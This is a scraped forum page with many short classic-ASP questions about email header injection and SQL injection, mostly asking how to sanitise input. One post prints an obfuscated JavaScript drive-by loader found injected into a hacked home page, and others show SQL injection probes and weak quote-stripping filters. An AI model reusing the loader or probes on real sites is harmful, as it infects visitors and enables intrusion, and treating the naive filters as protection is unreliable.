Email Injection
I have feedback forms on several of my sites and recently, they have been plagued with email injection attacks.
The forms are pretty straight-forward. Half a dozen fields get submitted to a formhandler.asp page where the contents are sent to some hard-coded email addresses using ASPmail.
From what I understand about how this works, spambots are used to add carriage returns after some of the form fields and then adding BCCs in to use the form to send out spam to other addresses. Here's an example of the emails I'm getting: .....
View Replies
ADVERTISEMENT
To sanitise the input from a form before it gets sent as an email, is it simply a matter of
Replace(Request.Form("formName"), " ' ", " ' ' ")
or is there more to it than that?
View Replies
View Related
Recently our contact forms on the website have been receiving messages with html links in the text entry fields. I'm assuming that a bot or something is using my mail script and bypassing the contact form.
I have seen posts about most other mail scripts in PHP that say the bots are injecting their own header information and effectively writing the message to their own BCC list.
Does someone have a thread out there about this and what can I do to keep people from sending html links through my forms to their own list. How do I check to see if they're successful or if I'm just getting a bunch of tests hitting the form and that the messages are only coming to me, the specified recipient.
View Replies
View Related
I recently built a login page and a friend of mine was working on something similar and said that I need to protect the login from SQL injection. I am not really sure what exactly that is. I think I have a rough idea but can someone explain it to me?
In addition, I will need to obviously protect what I built and am not sure how to go about doing that either.
View Replies
View Related
if anybody has a list of dodgy characters that can be used for sql injection attacks so that i can figure out a way to strip them from user inputs?
Also if somebody was filling in a form, that inserts into a "memo" field in access could this be used to launch such an attack or would whatever they type simply be inserted into the field? i hope that bit is clear.
i have a form field "message" which is a multi line text box, if someone typed into that box
DELETE * FROM Messages WHERE MessageID =1205
or some other command would that simply be inserted in to the database or would the server try and execute the command??
View Replies
View Related
I have heard a lot about SQL Injection. I was wondering how does an injector come to know about the table/column name when they cannot see the asp codes in a website?
View Replies
View Related
how do i test for SQL injection ?
sdo i do a SELECT statement in my username login?
View Replies
View Related
I just wanted to share it with you guys and ask your opinions. Code:
View Replies
View Related
Is it possible to "intercept" all calls to conn.execute and have them go to
a checking routine that will either let the command go through or terminate
it if it contains some illegal instructions? My clients company has had its
hacker free status revoked due to the possibility of sql injection. I could
put a function before every single conn.execute but we have hundreds of
them. Just wondering if there is some way of telling it to do something else
first. Maybe I can redefine conn.execute somehow?
View Replies
View Related
I have written several site functions to hopefully prevent against cross-site hacking, sql injection, and url encoding. I also have a symetric key encryption that is pretty basic (which isn't posted here and is total overkill). I was wondering if these functions are protecting well enough, or am I missing some tests?
Function InjFix(val)
InjFix=SEncode(Trim(Replace(val,"'","''")))
end Function
Function SEncode(val)
SEncode=Server.HtmlEncode(val)
end Function
Function URLEncode(val)
URLEncode=Server.URLEncode(val)
end Function
View Replies
View Related
I am using the method below to make sure that the query isNumeric and not longer than 4. It's a little snippet I found in another post... It works fine but I'm questioning whether it's enough.
URls like this, itemdetail.asp?-=#&ItemID=906, don't throw any errors because the "ItemID=906" is fine. Does the method used below really protect against SQL Injections in this case?
Code: ....
View Replies
View Related
I have heard a lot about SQL Injection. I was wondering how does an injector come to know about the table/column name when they cannot see the asp codes in a website?
View Replies
View Related
Anyone got some good methods for preventing html-injection in ASP?
View Replies
View Related
I have allways validated user input to pieces prior to integrating it into a SQL statement, in order to avoid SQL Injection attacs. A colleague of mine told me that binding my vars would make them SQL scalar, but I have been left in the dark as to HOW... The web left me none the wiser, as well, so here goes: Anyone got a brief example of binding vars in ASP to get me started?
View Replies
View Related
I believe someone is using my contact form and sending out spam. I'm getting thousands of undeliverable emails.
I don't know anything about asp. Someone who use to work here wrote the form processing script and it seems that all the forms on different domains are being processed by this script. It seems like they didn't do any sort of validation or checks and on one website there are hundreds of pages with the contact form, i could do it in php but that is way too much work.....
View Replies
View Related
I have just started a new job and I'm in charge of the databases at a college. We have a web page that the students can access to see their profile and course details. which is causing problems.
The students have to login into an e-learning site called moodle which is fine (moodle is all written in php). They can from there just browse moodle which has news and a message board etc. They can then also click a link to their profile, it is then directed to an asp page but it uses their login details from the php moodle site to retrieve their details from the database and display on the asp web page.
THE FOLLOWING IS A CODE EXTRACT....
View Replies
View Related
I have a multi-page ASP web application that uses information sent to it from the client in the Request.Forms collection, the Request.QueryString collection and the Request.Cookie collection.
What I want to do is to sanitise ALL the information sent to EVERY page.
I thought I'd achieve this by having an INCLUDE file inserted at the top of EVERY page.
This include file iterates through EVERY form, querystring and cookie item and removes anything that looks like malicious SQL injections from the values. Having completed this task, the many web pages then access the sanitised Request object with impunity.
One minor drawback is that it doesn't seem to work...I can't update the Request object with the sanitised value. [Error message: VBScript runtime error: Object doesn't suppor this property or method]
Either it's something silly in my coding or it's the wrong approach....please advise accordingly (code below).....
View Replies
View Related
Can anyone find fault with this code? I wrote in in hopes of preventing users from "breaking" SQL queries and getting places they shouldn't by using SQL Injections.
Code: ....
View Replies
View Related
I have been given a site to redo. In the process of looking at the code, the live site is open to SQL injection. I know what needs to be done but limited time right now to redo correctly. In the interm while I am rewriting the site, will adding a few lines of code as below prevent SQL injection until I have the time to rebuild the functions and move to stored procedures.
Basically client side I added a onKeypress javascript routine to look for ' or " and disallow in login fields ....
View Replies
View Related
I have been working on this particular project for a little over 2 weeks now. This product contains between 700-900 stored procedures to handle just about all you can imagine within the product. I just personally rewrote/reformatted close to 150 of them myself. Nothing too fancy, mostly a lot of formatting. We have a little down time between Q/A and fixing any bugs they find so I decided to test the security of the site with Cross-Site Scripting and SQL injection. Because SP's are used in pretty much every aspect of the site, the site isnt vunerable to the simple Injection stuff like '
OR 1 = 1 . Instead I've had to try several things which I will get to in a minute. As I have access to all of these SP's and the dB in which they reside, I could easly look at the code and determine what variables are neede to pass in. I've been trying to break the site to give up a database name so I can proceed to check the system tables etc etc - much like a regular hacker would (meaning not cheating by looking at the code). So, I've started my attack by downloading a local version of the login page, changing a few variables and injected somthing like:
'SELECT * FROM INFORMATION_SCHEMA.TABLES
Initially, the statement is passed into the form fields and wont return anything other than a JS popup error. I altered the statement intentionally to break the page
SELECT * FROM INFORMATION_SCHEMA.TA'
and it produces an error giving me the name of the query and its location when I plug the name of the query in the url i.e http://theurl.com/query_folder/query_name/ it fires me off to another folder containing an include file of some sort. When I run that include it gives me the name of a pretty important variable. Apparetly its a variable that determins what dB I should point to.
Now, one of the issues I have is that everything is a stored procedure so trying to hack it is a little more difficult ....
View Replies
View Related
Can anyone help me with an ASP function to perfom the following:
Series of page like this
item.asp?ItemId=2345
news.asp?NewsId=23456
Sale.asp?SaleId=344444
I need a function i can include in lots of pages that basically says
if query string is "ItemId" then only allow numerics of a maximum of 4
if query string is "NewsId" then only allow numerics of a maximum of 5
if query string is "SaleId" then only allow numerics of a maximum of 6
In all of the above query strings of 1,2,3 etc numerals must also work.
Any help appreciated as I'm in deep "poop" battling Chinese hackers.
View Replies
View Related
I created an ISAPI dll application to prevent SQL Injection attempts by
intercepting the HTTP requests and sanitizing both GET and POST variables (or
any combination of both) before the request reaches the intended code. This
is especially useful for legacy applications not designed to deal with MS SQL
Server Injection attempts. Though this application was designed with MS SQL
Server in mind, it can be used with no or minimal changes with other database
engines.
This ISAPI is only compatible with Internet Information Server (IIS) 6.0
which comes with Windows 2003. Windows XP uses IIS 5 engine which DOES NOT
support ISAPI Wildcard.
View Replies
View Related
One of my server has been compromised from this virus, and I can't seem to
block it out! I have shut down the infected server, but I need to figure
out how to check for this, and stop it.
The site is running iis5 on Windows2000, the backend DB is SQLServer 2000
Can anyone point me to some good resources for this? Code:
View Replies
View Related
We log hundreds of SQL injection attempts per day -- the type with
CAST(0x44004500... AS VARCHAR(4000)). It amuses me that the last thing the
attack does is DEALLOCATE its cursor. My SQL Server DBA tells me this makes
no difference. So...
Are these hackers cargo cultists? Or am I missing something?
View Replies
View Related
I use dynamic SQL queries in my sites. I know this is bad, but I grew up using Access as a data source and learned bad habits.
One of my MsSQL Server databases has just been hacked, despite me stripping common words/punctuation from the SQL statements - which I thought would prevent injection attack.
What I currently do is this (using three functions to strip out HTML, quotation marks and T-SQL code)
Code: .....
View Replies
View Related
My client received an email from a user who mentioned that by accident they had been typing (over the querystring I guess), and the url had become:
default.asp?pageid='asd
They then received a SQL Server error message.
My client contacted their webhost, who came back to them promptly and talked of 'SQL Injection', they said that we would need to secure the code as well as the permissions on the database(which I believe they have done)..
This is something I had over looked, and started to write a fix for a couple of nights ago...but I dont think its 100%....
Basically I now do this at the top of my default.asp page ...
View Replies
View Related
Is SQL injection an issue with SP's?
View Replies
View Related
I am working on an ecommerce app and want to be able to take my entire POST results as one item (or iterate through them) and check for any malicious SQL INJECTION items. After checking/escaping them i want to save them back into the post results. The reason for this is because I have coded the entire app and just learned about the dangers of SQL Injection and rather than going through every post var and fix it I would rather run a function at the beginning of each page.
View Replies
View Related
I've seen plenty of articles and utilities for preventing form injections for ASP.NET, but not too much for classic ASP. Are there any good input validation scripts that you use to avoid form injection attacks? I'm looking for good routines I can reuse on all of my form processing pages.
View Replies
View Related
This is weird, I'm pretty familiar with SQL Injection - but we're getting these weird injection that is writing in the default document or home page. What it's doing is putting in script code at the top or bottom of the home page... it looks something like this:
<script>function xy1q4877d47d91a36(q4877d47d92209){ function q4877d47d929d5
() {return 16;} return (parseInt(q4877d47d92209,q4877d47d929d5()));}funct ion
q4877d47d93974(q4877d47d94144){ var q4877d47d95c9b=2; var
q4877d47d94d7f='';q4877d47d96c3a=String.fromCharCo de;for(q4877d47d954cc=0;q4877d47d954cc<q4877d47d94144.length;q4877d47d954cc+=q4877d47d95c 9b){
q4877d47d94d7f+=(q4877d47d96c3a(xy1q4877d47d91a36( q4877d47d94144.substr(q4877d47d954cc,q4877d47d95c9 b))));}return
q4877d47d94d7f;} var
q4877d47d9740a='3C7363726970743E696628216D79696129 7B646F63756D656E742E777269746528756E65736361706528 20272533632536392536362537322536312536642536352532 30253733253732253633253364253237253638253734253734 25373025336125326625326625373425373225373525363525 37322536392536652536372537342536662536652536352537 33253265253665253635253734253266253733253635253631 25373225363325363825326525363325363725363925336625 36322536312536312536372536392537322536632625323725 32622534642536312537342536382532652537322536662537 35253665253634253238253464253631253734253638253265 25373225363125366525363425366625366425323825323925 32612533352533352533352533362533372532392532622532 37253634253335253332253338253237253230253737253639 25363425373425363825336425333125333825333125323025 36382536352536392536372536382537342533642533332533 30253337253230253733253734253739253663253635253364 25323725363425363925373325373025366325363125373925 33612532302536652536662536652536352532372533652533 63253266253639253636253732253631253664253635253365 2729293B7D766172206D7969613D747275653B3C2F73637269
70743E';document.write(q4877d47d93974(q4877d47d974 0a));</script>
What it's doing is decoding itself into an iframe that links out to popups that will try and download a virus on your machine. I don't get the popup in my machine because i think i have a newer version of IE. But some people have complained that it is installing a virus on their machine.
Also what is crazy is when I replace the file with a good version. In about 30 mins, it automatically overwritten with the infected version. Also I've noticed it on some other websites that I haven't touched.
Has anyone encountered this before? Because I'm stumped as to the cause of it. I don't see the issue on our dev server. It seems to be IIS on a shared host.
View Replies
View Related
Im running a simple mail system program which emails newsletters to a database list of 3000+ users.
The program loops through a database containing the emails and sends them out using ASPEmail.
My question is, is there some way i can validate each email address so that if there are invalid characters e.g. the space in "blah @blah.com"
it will skip the record and continue the loop.
At the moment i have a working program however, whenever the program comes across an invalid email address it stops at that record and prevents the program from emailing any further.
View Replies
View Related
I am having a problem formatting an email message which comes from a form.
I am currently having difficulty with the <br> tag which I am using for line spaces within my email. I am getting an expected statement error message which is pointing to the line which is underlined below. I can't think what is causing this.
The code for my processing page is below:-
View Replies
View Related
1. I want users to type in their email address on a textfield, and after users press the "Submit" button. The info will automatically go to another person's email to receive a compliment, suggestion, etcetera.
2. Another is how to include the message written on a textarea of a form with the ASP code supplied below: Code:
View Replies
View Related